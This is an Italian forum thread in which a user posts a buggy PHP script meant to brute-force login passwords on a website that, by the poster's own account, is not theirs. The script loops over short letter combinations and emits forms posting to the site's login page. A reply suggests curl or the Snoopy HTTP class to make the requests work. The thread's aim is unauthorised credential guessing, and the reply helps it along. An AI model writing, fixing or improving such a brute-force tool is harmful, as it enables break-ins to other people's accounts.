Visualizzazione dei risultati da 1 a 3 su 3
  1. #1

    dal mio form a uno non di mia proprietā

    ciao,

    io vorrei invia i dati di login dal mio form a quello di un sito(simile a un brute force), per fare questo io ho provato cosi:


    <?php
    $handle = fopen("program.txt", "a+");

    $sito='www.sito.it';
    $port=80;
    $page='/login.php';
    if (!($fp=fsockopen($sito,$port)))
    die ("Impossibile collegarsi al sito\n");
    set_time_limit(5);
    $string=" abcdefghilmnopqrstuvz";
    for($a=0; $a<=strlen($string); $a++) {
    for($b=0; $b<=strlen($string); $b++) {
    for($c=0; $c<=strlen($string); $c++) {
    for($d=0; $d<=strlen($string); $d++) {
    $s=$string{$a}.$string{$b}.$string{$c}.$string{$d} ."\n \r";
    $gfg=$string{$a}.$string{$b}.$string{$c}.$string{$ d}."";
    $search="-$gfg-";






    echo'<script language="javascript">';


    $buffer_size = strlen($search);
    // optimized solution
    // $buffer_size = max(strlen($search), 8192);

    $found = false;
    $content = '';
    $prev_token = '';
    while (!feof($handle)) {

    $token = fread($handle, $buffer_size);
    $content = $prev_token . $token;
    $prev_token = $token;

    if (strpos($content, $search) !== false) {
    $found = true;
    break;
    }
    }

    if ($found === true) {
    echo"aa";} else {

    $fr="-$gfg-";
    echo"</script>";

    $fr="-$gfg-";
    fwrite($handle,$fr);
    echo"<form action='http://www.sito.it/login.php' name='snd' method='post'>";
    echo"<input class='fm fm110' type='text' maxlength='15' value='nome utente' name='eb66be1'/>";
    $query_string="nomevoce=$i";
    $len=strlen($query_string);
    echo"<input class='fm fm110' type='password' maxlength='30' value='$s' name='e67efdd'/>";
    echo"<script language='JavaScript'>
    function invio(){
    document.send.submit()
    }
    </script>
    ";
    }
    }
    }
    }
    }

    fclose($fp);
    fclose($handle);
    ?>


    ma a quanto pare non funziona, non solo non effettua il login ma quando riapro la pagina mi si blocca firefox invece di ripartire da dove č salvato

    qualcuno di voi sā aiutarmi?
    grazie in anticipo.

  2. #2
    Prova con http://www.php.net/curl oppure scaricati una classe tipo Snoopy che implementa correttamente il protocollo HTTP.

  3. #3
    scusa ma curl devo usarlo per trovare l'errore ?
    snoopy come funziona?
    grazie

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.